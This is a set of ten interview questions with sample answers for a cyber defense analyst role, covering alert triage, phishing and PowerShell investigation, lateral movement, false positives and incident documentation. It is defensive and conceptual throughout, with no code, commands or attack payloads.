Question 1
Difficulty: medium
How do you prioritize alerts when multiple security events come in at the same time?
Sample answer
I start by separating noise from true risk. My first pass is to look at asset criticality, user context, source reputation, and whether the events are linked to a broader pattern. For example, a failed login on a low-value test account is not equal to a successful sign-in from an unusual location followed by privilege changes on a finance system. I also check whether the alert is time-sensitive, such as ransomware behavior, suspicious PowerShell activity, or outbound connections to known malicious infrastructure. When volume is high, I use a triage checklist so I stay consistent and avoid tunnel vision. If something looks credible, I escalate quickly with clear notes on what I observed, what I ruled out, and what I recommend next. That helps the team act faster and makes my analysis easier to validate later.
Question 2
Difficulty: easy
Walk me through how you would investigate a suspected phishing email reported by an employee.
Sample answer
I would treat it as both a user report and a potential threat indicator. First I would collect the message headers, sender address, URLs, attachments, and any evidence of user interaction. Then I would check whether the sender domain is spoofed, newly registered, or related to known malicious activity. If there is a link, I would analyze it safely, confirm whether it redirects through suspicious infrastructure, and look for credential harvesting or malware delivery. I would also search the mail gateway and SIEM for similar messages sent to other users. If someone clicked the email, I would verify account activity, reset credentials if needed, and confirm whether the endpoint showed any unusual behavior. I think the key is to move fast, but not guess. A good investigation should answer three things: what the email is, who else saw it, and whether it created any real exposure.
Question 3
Difficulty: hard
Describe how you would investigate a suspicious PowerShell process on a workstation.
Sample answer
I would start by validating the context of the process instead of assuming it is malicious. PowerShell is legitimate in many environments, so I would review the command line, parent process, execution time, user account, and whether the script was launched interactively or through automation. I would compare the behavior to baseline activity on that host and other endpoints. If I saw encoded commands, hidden windows, network calls, file drops, or unusual child processes, that would increase concern. Next I would check EDR telemetry, script block logging, and Windows event logs to understand what the command actually did. If it appears suspicious, I would isolate the machine if needed, preserve evidence, and look for lateral movement or credential access. I like to be systematic here, because the difference between admin activity and attack activity is often in the details around intent, frequency, and follow-on behavior.
Question 4
Difficulty: medium
Tell me about a time you had to respond to a security incident under pressure.
Sample answer
In a previous role, we received an alert that looked like possible account compromise on a privileged user. The timing was bad because it happened during a busy period, and several other tickets were already open. I immediately focused on the highest-risk actions: verifying the login source, checking for mailbox forwarding rules, reviewing recent privilege activity, and determining whether the account had touched sensitive systems. Once I confirmed the sign-in was coming from an unfamiliar location and there were additional suspicious actions, I escalated to containment and coordinated with the help desk to reset credentials. I also documented every step so the incident lead had a clean timeline. What I learned from that situation is that pressure can make people rush, but a calm, disciplined process is what prevents mistakes. The event was contained without evidence of broader spread, and the team later used my notes to improve the response playbook.
Question 5
Difficulty: medium
What logs and data sources do you rely on most when hunting for signs of compromise?
Sample answer
I like to combine endpoint, identity, network, and email data instead of leaning too heavily on one source. On the endpoint side, EDR telemetry, process execution logs, command-line arguments, file creation, and registry changes are especially useful. For identity activity, I pay close attention to authentication logs, MFA events, risky sign-ins, privilege changes, and impossible travel patterns. Network logs help me spot unusual outbound traffic, DNS anomalies, beaconing, and connections to rare destinations. I also value email gateway logs and proxy data because many incidents start with phishing or malicious links. The most useful hunts usually come from correlating multiple low-confidence signals into one stronger story. A single failed login may not mean much, but failed logins plus token abuse, mailbox rule creation, and unusual downloads can reveal a real compromise. Good analysis depends on being able to connect those dots quickly and accurately.
Question 6
Difficulty: easy
How do you distinguish between a false positive and a real threat in your day-to-day work?
Sample answer
I try to evaluate alerts against context, not just the rule name. A false positive usually falls apart when I check the asset, user, and behavior against known business activity. For example, if a detection flags an admin tool, I would verify whether the command was issued by an approved engineer, from a managed device, during normal working hours, and whether the result matched expected maintenance activity. A real threat often has indicators that do not fit the environment: unusual account use, repeated failed access, off-hours execution, rare parent-child process combinations, suspicious external destinations, or evidence of persistence. I also look at whether the event is isolated or part of a sequence. In my experience, a lot of false positives can be dismissed quickly, but I never rush to close an alert until I have enough evidence to explain why it is benign. That discipline reduces missed incidents.
Question 7
Difficulty: hard
If you noticed signs of possible lateral movement inside the network, what would you do first?
Sample answer
My first priority would be containment awareness and scope. I would confirm the indicator of lateral movement, such as remote service creation, unusual remote execution, abnormal admin shares, or repeated authentication attempts across hosts. Then I would identify the source system, the target systems, and whether privileged credentials may have been used. If the evidence suggests active spread, I would escalate quickly to isolate affected endpoints or accounts based on our response procedures. At the same time, I would search for related activity across logs to determine how far the movement has gone and whether sensitive systems are involved. I would also preserve relevant evidence before taking disruptive steps whenever possible. The key is not to assume it is contained just because one system looks suspicious. Lateral movement can look small at first and then become widespread very fast, so speed, coordination, and clean documentation matter a lot.
Question 8
Difficulty: medium
How do you stay current with evolving attacker techniques and apply that knowledge to your work?
Sample answer
I treat staying current as part of the job, not something I do only when I have extra time. I read incident reports, threat research, vendor writeups, and analyst blogs to understand how attackers are changing their tradecraft. I also pay attention to what I see internally, because real detections and near-misses often tell you more than any article can. When a new technique becomes relevant, I think about where it would show up in our environment and what logs would confirm it. For example, if I learn about a new living-off-the-land method, I will look at what process chains, command lines, and authentication patterns might expose it. I also like to share useful findings with the team so the knowledge becomes operational, not just personal. The goal is to convert threat intelligence into practical detection and faster analysis, not just to collect interesting information.
Question 9
Difficulty: medium
How would you handle a situation where a business unit pushes back on security containment because it affects operations?
Sample answer
I would explain the risk clearly and keep the conversation focused on facts. Business teams usually respond better when they understand the impact in operational terms, not just security language. If containment is necessary, I would describe what we know, what could happen if we delay, and what options exist to reduce disruption. For example, isolating one endpoint may be better than shutting down a broader segment, or temporarily disabling one account may stop an active attack while preserving most work. I also try to involve the right stakeholders early so the decision is not made in a vacuum. If there is room to validate a less disruptive option, I will test that carefully, but I will not let convenience override containment when the evidence shows real risk. My approach is to be firm on security requirements and respectful about business pressures, because long-term trust depends on both.
Question 10
Difficulty: easy
What does good incident documentation look like to you in a cyber defense role?
Sample answer
Good documentation is clear, chronological, and useful to someone who was not in the room when the incident started. I want it to answer what happened, when it happened, who was affected, what evidence supports the conclusion, what actions were taken, and what remains unresolved. I avoid vague language and make sure I include timestamps, log references, hostnames, usernames, hashes, IPs, and any containment steps. I also separate confirmed facts from assumptions so the response team knows what is solid and what still needs verification. Strong documentation should support both immediate response and later review, because the same notes may be used for remediation, reporting, or a lessons-learned session. In practice, I write as I work so I do not lose details under pressure. That habit makes handoffs smoother and reduces the risk of repeating work or missing important clues during a fast-moving incident.
